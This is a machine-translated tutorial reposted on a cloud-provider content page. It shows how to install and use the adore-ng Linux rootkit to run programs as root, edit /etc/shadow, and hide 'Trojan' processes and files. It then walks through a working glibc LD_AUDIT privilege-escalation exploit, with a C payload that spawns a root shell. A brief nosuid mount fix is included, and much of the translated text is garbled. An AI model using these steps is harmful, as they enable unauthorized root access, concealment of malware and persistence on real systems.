Adore-ng notes and Linux general user rights

Source: Internet
Author: User
Tags file permissions

Official website: https://github.com/trimpsyw/adore-ng

Installation:

[Email protected] ~]# Unzipadore-ng-master.zip

[Email protected] ~]# Cdadore-ng-master

[[email protected] adore-ng-master] #rpm-ivh/mnt/packages/kernel-devel-2.6.32-220.el6.x86_64.rpm

Yum Install gcc*

[[Email protected]]# make

[Email protected]]# insmod Adore-ng.ko #加载模块

Test, view Help:

[Email protected]]#./ava-h

Usage:./ava {h,u,r,r,i,v,u}[file or PID]

I Print info (Secret UID etc)

H Hide File #隐藏文件

U Unhide File

R EXECUTE as Root #可以提权, run the program as root

R Remove PID Forever

U Uninstall Adore

I make PID invisible #隐藏进程. Hide your Trojan program

V Make PID visible

Test: Prepare the environment and create an ordinary user to test. Then on the average user, through the AVA command, after the right to run a process as root.

Power: Improve your own permissions on the server.

[Email protected] ~]# Useradd tree

[Email protected] ~]# echo 123456| passwd--stdin Tree

changing password for Usertree

Passwd:all Authenticationtokens updated successfully.

Example 1: Rights are raised through the AVA command. Allow normal user tree to gain root privileges

[Email protected]]# cp-r/root/adore-ng-master/tmp/

[Email protected]]# chmod 777/tmp/adore-ng-master/-R

[[email protected] adore-ng-master] #ssh [email protected] #以普通帐号登录

[Email protected] ~]$ cd/tmp/adore-ng-master/

[[email protected]] $ pwd

/tmp/adore-ng-master

[[email protected] Adore-ng-master]$./ava I #查看基本信息, can pop up the following information to show that the program is working properly

56,500,500,56

Adore 1.56 installed. Goodluck.

elite_uid:2618748389,elite_gid=4063569279, ADORE_KEY=FGJGGGFD current_adore=56

Actual combat: R option: Execute AS Root #以root身份运行程序

[[email protected] adore-ng-master] $ll/etc/shadow

----------1 root root 1071Apr 7 10:17/etc/shadow

[[email protected] adore-ng-master] $vim/etc/shadow

[[email protected] adore-ng-master]$./ava r Vim/etc/shadow #编辑时, can write some content, test whether can write normally

To view the modification success:

[Email protected] ~]# Vim/etc/shadow

In addition, the user identity of this process is viewed on a different terminal:

[Email protected] ~]# Ps-axu | grep Shadow

Warning:bad syntax, perhaps Abogus '-'? See/usr/share/doc/procps-3.2.7/faq

Root 6874 0.1 0.1 10216 2924 PTS/3 s+ 04:12 0:00/usr/bin/vim/etc/shadow

Root 6879 0.0 0.0 4024 692 pts/2 s+ 04:12 0:00 grep Shadow

Leave the back door, no one to see?

Combat 2: Hide the process. Hide your Trojan program

Simulate a Trojan horse program:

[Email protected]]$ cat a.sh

#!/bin/bash

Sleep 2000

[Email protected]]$ chmod +x a.sh

[Email protected]]$./a.sh &

View:

[Email protected] ~]# Ps-axu | grep a.sh

Warning:bad syntax,perhaps a bogus '-'? See/usr/share/doc/procps-3.2.8/faq

Tree 6339 0.0 0.1 106148 1184 PTS/3 S 10:32 0:00/bin/bash./a.sh

Hide Process

[Email protected]]$./ava I 6339 #隐藏进程

56,500,500,56

Adore 1.56 installed. Goodluck.

Made PID 6339 invisible.

[Email protected] ~]# Ps-axu |grep a.sh #查看

Warning:bad syntax, perhaps Abogus '-'? See/usr/share/doc/procps-3.2.8/faq

Root 10225 0.0 0.0 103300 852 PTS/4 s+ 22:54 0:00 grep a.sh

Combat 3: Hide Files

[[email protected] adore-ng-master] $mkdir test

[[email protected] adore-ng-master] $CD test/

[Email protected] test]$ echo AAAA >a.php

[Email protected] test]$ ls-a

. .. a.php

Hide File

[Email protected] Test]$/tmp/adore-ng-master/ava h a.php

56,500,500,56

Adore 1.56 installed. Goodluck.

File ' a.php ' is now hidden.

View:

[Email protected] test]$ ls-a

. ..

[email protected] test]$ cat a.php

Aaaa

Try: Find the file that was recently modified

[[email protected] test] $touch b.php

[[email protected] test]$ ls

b.php

[[email protected] test] $find./-mtime-2

./

./b.php #找不到出来

There is no way to view the a.php: No. Unless you turn off the rootkit Trojan.

To recover it:

[Email protected] Test]$/tmp/adore-ng-master/ava u a.php

56,500,500,56

Adore 1.56 installed. Goodluck.

File ' a.php ' is now visible.

[Email protected] test]$ ls-a

. .. a.php

Summarize:

1. Right to be raised through rootkits

2, through the rootkit hidden Trojan process number

3. Hide Trojan files via rootkits

Create a Trojan file that will not be deleted by the root user

[[Email protected] ~] #lsattr b.txt

----I--------E-b.txt

[[Email protected] ~] #chattr-I b.txt

[Email protected] ~]# RM-RF b.txt

Actual combat 2:linux under the ordinary user right to withdraw

Right: you don't understand. Listen to the depth, the latter can make the effect can be

Right: Elevate from normal user to root privilege

Note: The following vulnerabilities exist for RHEL5 to RHEL6.0 32-bit operating systems and 64-bit operating systems.

Exploit the vulnerability of the GLIBC library to raise power.

Log in as a normal user

[Email protected] ~]# SU-MK

[Email protected] ~]$

SUID: When the user executes command A, this command is run as the owner of command A.

[Email protected] ~]$ cd/tmp/

[[email protected] tmp] $ls-ld/tmp/

DRWXRWXRWT Root root4096 10-14 21:29/tmp/

[[email protected] tmp] $CD/tmp/

[[email protected] tmp] $mkdir exploit//Create a folder anywhere in the TMP directory exploit: Use

[[Email protected]]$ ll/bin/ping

-rwsr-xr-x 1 root root35832 Apr 2009/bin/ping

[[email protected] tmp] $LN/bin/ping/tmp/exploit/target//Create a hard link to the/bin/ping, the name of the hard link casually up

[[email protected] tmp] $exec 3</tmp/exploit/target

[[email protected] tmp] $LS-l/PROC/$$/FD/3

Lr-x------1 Hellohello 10-20 09:30/PROC/10990/FD/3-/tmp/exploit/target

[[email protected] tmp] $RM-fr/tmp/exploit/

[[email protected] tmp] $LS-l/PROC/$$/FD/3//View link has been deleted

Lr-x------1 Hellohello 10-20 09:30/proc/10990/fd/3/tmp/exploit/target (Deleted)

[[email protected] tmp] $CAT PAYLOAD.C//write a C language program

Void__attribute__ ((constructor)) init ()

{

setuid (0);

System ("/bin/bash");

}

[[email protected] tmp] $GCC-W-fpic-shared-o/tmp/exploit PAYLOAD.C//Compile C program

[[email protected] tmp] $LS-l/tmp/exploit

-rwxrwxr-x 1 Hellohello 4223 10-20 09:32/tmp/exploit

[[email protected] tmp] $whoami

Mk

[[email protected] tmp] $LD _audit= "\ $ORIGIN" EXEC/PROC/SELF/FD/3

[[email protected] tmp] #whoami

Root

In the RHEL6.1 attempt, the previous commands can be executed successfully, at the end of this command times the following error, and directly using the normal user to log out.

Hint: The image $origin cannot be loaded as an audit interface

Unable to open shared file ject;

Workaround:

You can control your rights by doing the following on the 777 directory. such as/tmp

# Mount-o Bind,nosuid/tmp/tmp

The user's home directory also needs to be patched with the above method:

[[Email protected] ~] #mount-o BIND,NOSUID/HOME/MK/HOME/MK

Modification is not necessary, the following error is prompted when you execute the LN command.

[Email protected] ~]# SU-MK

[Email protected] ~]$ ln/bin/ping/tmp/ping

ln:creating hard link '/tmp/ping ' = '/bin/ping ': Invalid cross-device link

#报错, error when creating a hard link, invalid cross device connection

Note: The Find permission is a 777 folder:

[Email protected] ~]# find/-perm-777-type D

/var/tmp

/dev/.mdadm

/dev/.udev

/dev/.udev/rules.d

/dev/shm

Find: '/PROC/9346/TASK/9346/FD/5 ': No such file or directory

Find: '/PROC/9346/TASK/9346/FDINFO/5 ': No such file or directory

Find: '/PROC/9346/FD/5 ': No such file or directory

Find: '/PROC/9346/FDINFO/5 ': No such file or directory

/tmp

/tmp/vmwarednd

/tmp/. Ice-unix

/tmp/. X11-unix

Normal user's home directory/home/ordinary users

Note:

-perm mode: File permissions exactly match mode

-perm +mode: File Permissions section matches mode

-perm-mode: File permissions are fully compliant with mode

Adore-ng notes and Linux general user rights

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.